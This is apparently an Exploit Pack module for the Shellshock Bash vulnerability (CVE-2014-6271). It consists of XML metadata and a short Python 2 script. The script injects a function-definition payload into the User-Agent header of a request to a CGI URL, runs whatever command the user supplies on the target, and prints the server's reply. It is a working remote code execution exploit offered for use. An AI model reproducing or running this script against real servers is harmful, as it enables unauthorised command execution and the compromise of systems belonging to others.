<?xml version="1.0" encoding="UTF-8"?>

<Module>


    <Exploit NameXML="Bash-CMD-Injection" CodeName="BashCMDInjection.py"
Platform="linux" Service="http" Type="remote" RemotePort="80" LocalPort=
"4444" ShellcodeAvailable="E" ShellPort="4444" SpecialArgs="">

    </Exploit>


    <Information Author="Juan Sacco" Date="Dec 29 2014" Vulnerability=
"2014-6271">

GNU Bash through 4.3 processes trailing strings after function definitions
in the values of

environment variables, which allows remote attackers to execute arbitrary
code via a crafted environment.

</Information>


    <Targets>

       Any Bash 4.43 > and prior

    </Targets>


</Module>

# Modified by JSacco - jsacco@exploitpack.com

# Exploit Pack 2014

# How to run: checkCVE20146271.py http://www.server.com/script.cgi


import urllib2, sys


Target = sys.argv[1]

Port = int(sys.argv[2])

ShellcodeType = sys.argv[3]

Extra = sys.argv[4]


print "Check a host: checkbash.py http://www.domain.com/script.cgi"

print "Info: GNU Bash through 4.3 processes trailing strings after function
definitions in the values of environment variables, which allows remote
attackers to execute arbitrary code via a crafted environment, as
demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd,
the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts
executed by unspecified DHCP clients, and other situations in which setting
the environment occurs across a privilege boundary from Bash execution, aka
ShellShock."

print "###########################################################"

header = {'User-Agent': '() { :;}; echo Content-type:text/plain;echo;%s'
%(Extra)}


request = urllib2.Request(Target, '', header)

if urllib2.urlopen(request).read().find("www") != -1 or
urllib2.urlopen(request).read().find("http") != -1:

    print "Response from server:", urllib2.urlopen(request).read()

    print "Seems vulnerable:", Target